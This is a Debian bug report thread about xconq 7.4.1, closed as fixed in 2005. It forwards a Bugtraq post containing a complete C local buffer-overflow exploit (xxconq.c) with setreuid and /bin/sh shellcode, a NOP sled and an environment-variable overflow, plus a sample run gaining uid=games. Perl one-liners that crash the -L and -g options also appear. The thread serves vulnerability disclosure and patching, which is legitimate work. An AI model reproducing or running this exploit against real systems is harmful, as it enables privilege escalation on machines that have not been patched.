Your message dated Wed, 02 Nov 2005 11:16:57 +0100
with message-id <[EMAIL PROTECTED]>
and subject line Fixed in xconq 7.4.1-1
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 27 Dec 2000 07:41:27 +0000
>From [EMAIL PROTECTED] Wed Dec 27 01:41:27 2000
Return-path: <[EMAIL PROTECTED]>
Received: from kitenet.net [198.144.200.155] (postfix)
by master.debian.org with esmtp (Exim 3.12 1 (Debian))
id 14BBDC-0003HR-00; Wed, 27 Dec 2000 01:41:26 -0600
Received: by kitenet.net (Postfix, from userid 500)
id 6A33EBC141; Tue, 26 Dec 2000 23:41:25 -0800 (PST)
Date: Tue, 26 Dec 2000 23:41:25 -0800
From: Joey Hess <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: FWD: xconq7.4.1 exploit.
Message-ID: <[EMAIL PROTECTED]>
Mail-Followup-To: Joey Hess <[EMAIL PROTECTED]>, [EMAIL PROTECTED],
[EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Delivered-To: [EMAIL PROTECTED]
Package: xconq
Severity: important
If this exploit actually works, we're vulnerable. Doesn't build for
me, but xconq is sgid and has buffer overflows:
[EMAIL PROTECTED]:~>xconq -L `perl -e "print 'a' x 10000"` >/dev/null
zsh: segmentation fault xconq -L `perl -e "print 'a' x 10000"` > /dev/null
[EMAIL PROTECTED]:~>xconq -g `perl -e "print 'a' x 10000"` >|/dev/null
zsh: segmentation fault xconq -g `perl -e "print 'a' x 10000"` >| /dev/null
Not a good sign.
----- Forwarded message from Chris Sharp <[EMAIL PROTECTED]> -----
From: Chris Sharp <[EMAIL PROTECTED]>
Date: Mon, 25 Dec 2000 07:18:07 -0000
To: [email protected]
Subject: xconq7.4.1 exploit.
X-Mailer: Security Focus
Reply-To: [EMAIL PROTECTED]
i saw some mention of xconq on bugtraq, but no
exploit. decided to take a lookie at it...took a
little more work than expected to successfully
exploit(without a display), but none-the-less:
original(unwarpped/working):
http://realhalo.org/xxconq.c
xxconq.c(wrapped):
--------------------------------------------------
/* (linux)xconq[v7.4.1] local buffer overflow, by:
[EMAIL PROTECTED] this
will give you uid=games on systems with
xconq. this exploit was slightly
more work than i thought it was going to be.
i originally wrote this
exploit for the -g parameter. but, via the -g
parameter you must have a
display. via ths -L parameter you do not need
a display, but it is much
more exact. in this method you have to fill
the XCONQCONFIG environmental
variable to a certain point to be able to
overwrite the eip via the -L
parameter. (64 bytes is more than enough). i
also needed to modify some
shellcode for this. all in all, too much work
for what it is worth.
example(test usage):
------------------------------------------------------------------------------
bash# echo id|(id;cc xxconq.c -o xxconq;./xxconq
-5000 0 20 507)
fakehalo: uid:1000 gid:100. [euid:1000 egid:100]
[ (linux)xconq[v7.4.1] local buffer overflow, by:
[EMAIL PROTECTED] ]
*** [data]: addr: 0xbffffdc4, offset: -5000,
alignment: 0, uid: 20, cap: 507.
*** [data]: sizeof(bofeip): 512, sizeof(env):
4096, sizeof(push): 64, nop=3579.
Welcome to X11 Xconq version 7.4.1
(Dec 2000)
Xconq is free software and you are welcome to
distribute copies of it
under certain conditions; type "o copying" to see
the conditions.
There is absolutely no warranty for Xconq; type "o
warranty" for details.
fakehalo: uid:20 gid:100. [euid:20 egid:100]
bash#
------------------------------------------------------------------------------
note: built and tested on slackware. some
other overflowable functions i
will mention are the -g parameter and
the XCONQLIB environmental
variable, both of those overflows
require a display to exploit.
this program also has an odd usage of
setuid(); in it to drop its
privileges -- making it possible to
break. and yes, i squished the
code together on purpose. why? i am a
*x80 resolution kinda guy :/.
*/
#define PATH "/usr/local/bin/xconq" // path to
xconq7.4.1.
#define DEFAULT_ALIGN 0 // generic
alignment.
#define DEFAULT_OFFSET -5000 // generic
offset. (from bufsize)
#define DEFAULT_UID 20 // user id
of games.
#define DEFAULT_CAP 507 // exact
buffer cut off point.
#define FILLER 0x78 // filling
character, for misc use.
static char exec[]= // setreuid()+exec():
[EMAIL PROTECTED]
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0\xb0\x46\xcd\x80\x31\xdb"
"\x31\xc9\xb3\x00\xb1\x00\x31\xc0\xb0\x46\xcd\x80\xeb\x24\x5e\x8d\x1e\x89\x5e"
"\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
"\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bofeip[512],env[4096],push[64];int
i,offset,align,uid,cap;long ret;
printf("[ (linux)xconq[v7.4.1] local buffer
overflow, by: [EMAIL PROTECTED]"
". ]\n");
if((argv[1]&&!strcmp(argv[1],"-h"))||(argv[1]&&!strcmp(argv[1],"--help"))){
printf("*** [syntax]: %s [offset] [alignment]
[user id] [capoff buffer value"
"].\n",argv[0]);
printf("*** [required]: argument alignment value
must be: 0-3.\n");
printf("*** [required]: argument user id value
must be: 1-255.\n");
printf("*** [required]: argument cap value must
be: 1-%d.\n",sizeof(bofeip));
exit(0);
}
if(argc>1){offset=atoi(argv[1]);}else{offset=DEFAULT_OFFSET;}
if(argc>2){
if(atoi(argv[2])>3||atoi(argv[2])<0){
printf("*** [error]: ignored argument alignment
value: %s. (use 0-3)\n",
argv[2]);align=DEFAULT_ALIGN;
}
else{align=atoi(argv[2]);}
}
else{align=DEFAULT_ALIGN;}
if(argc>3){
if(atoi(argv[3])<1||atoi(argv[3])>255){
printf("*** [error]: ignored argument uid
value: %s. (use 1-255)\n",
argv[3]);uid=DEFAULT_UID;
}
else{uid=atoi(argv[3]);}
}
else{uid=DEFAULT_UID;}
if(argc>4){
if(atoi(argv[4])<1||atoi(argv[4])>sizeof(bofeip)){
printf("*** [error]: ignored argument cap
value: %s. (use 1-%d)\n",argv[4],
sizeof(bofeip));cap=DEFAULT_CAP;
}
else{cap=atoi(argv[4]);}
}
else{cap=DEFAULT_CAP;}
ret=(esp()-offset);for(i=0;i<align;i++){bofeip[i]=FILLER;}
for(i=align;i<(sizeof(bofeip)-4);i+=4){*(long
*)&bofeip[i]=ret;}
bofeip[cap]=0x0;
for(i=0;i<(sizeof(env)-strlen(exec)-strlen(bofeip));i++){env[i]=0x90;}
exec[10]=uid;exec[22]=uid;exec[24]=uid;memcpy(env+i,exec,strlen(exec));
env[(i+strlen(exec))]=0x0;printf("*** [data]:
addr: 0x%lx, offset: %d, alignm"
"ent: %d, uid: %d, cap: %d.\n*** [data]:
sizeof(bofeip): %d, sizeof(env): %d,"
" sizeof(push): %d,
nop=%d.\n",ret,offset,align,uid,cap,sizeof(bofeip),
sizeof(env),sizeof(push),(strlen(env)-strlen((char
*)strrchr(env,0x90))+1));
setenv("EXEC",env,1);memset(push,FILLER,sizeof(push));
push[sizeof(push)]=0x0;setenv("XCONQCONFIG",push,1);
if(execl(PATH,PATH,"-L",bofeip,0)){
printf("*** [error]: could not execute %s
properly.\n",argv[0]);
exit(-1);
}
}
----- End forwarded message -----
--
see shy jo
---------------------------------------
Received: (at 80576-done) by bugs.debian.org; 2 Nov 2005 10:17:15 +0000
>From [EMAIL PROTECTED] Wed Nov 02 02:17:15 2005
Return-path: <[EMAIL PROTECTED]>
Received: from mail.irb.hr [161.53.22.8] (UNKNOWN)
by spohr.debian.org with esmtp (Exim 3.36 1 (Debian))
id 1EXFgA-0007vx-00; Wed, 02 Nov 2005 02:17:15 -0800
Received: from diziet.irb.hr (diziet.irb.hr [161.53.22.31])
by mail.irb.hr (8.13.3/8.13.3/Debian-6) with ESMTP id jA2AGskp000686;
Wed, 2 Nov 2005 11:16:54 +0100
Received: from diziet.irb.hr (localhost [127.0.0.1])
by diziet.irb.hr (8.13.5/8.13.5/Debian-3) with ESMTP id jA2AGvXJ020994;
Wed, 2 Nov 2005 11:16:57 +0100
Received: (from [EMAIL PROTECTED])
by diziet.irb.hr (8.13.5/8.13.5/Submit) id jA2AGvrd020992;
Wed, 2 Nov 2005 11:16:57 +0100
From: Matej Vela <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED],
[EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: Fixed in xconq 7.4.1-1
Date: Wed, 02 Nov 2005 11:16:57 +0100
Message-ID: <[EMAIL PROTECTED]>
User-Agent: Gnus/5.110004 (No Gnus v0.4) Emacs/21.4 (gnu/linux)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Scanned-By: MIMEDefang 2.51 on 161.53.22.8
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Level:
X-Spam-Status: No, hits=-3.0 required=4.0 tests=BAYES_00 autolearn=no
version=2.60-bugs.debian.org_2005_01_02
X-CrossAssassin-Score: 10
Source: xconq
Source-Version: 7.4.1-1
This was marked as an NMU by mistake:
xconq (7.4.1-1) unstable; urgency=low
* New maintainer.
* Applied patch from Andreas Rottmann <[EMAIL PROTECTED]> (Closes:
bug#80576)
* Applied patch from James Morrison <[EMAIL PROTECTED]>
(Closes: bug#107313)
* New upstream version (Closes: bug#107410, bug#125961, bug#67474,
bug#86306, bug#67934)
* New versions of config.sub and config.guess were added.
(Closes: bug#90043, bug#78672)
* The package was rebuilt from scratch (Closes: bug#110222)
-- Timo Benk <[EMAIL PROTECTED]> Wed, 27 Feb 2002 19:25:13 +0100
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
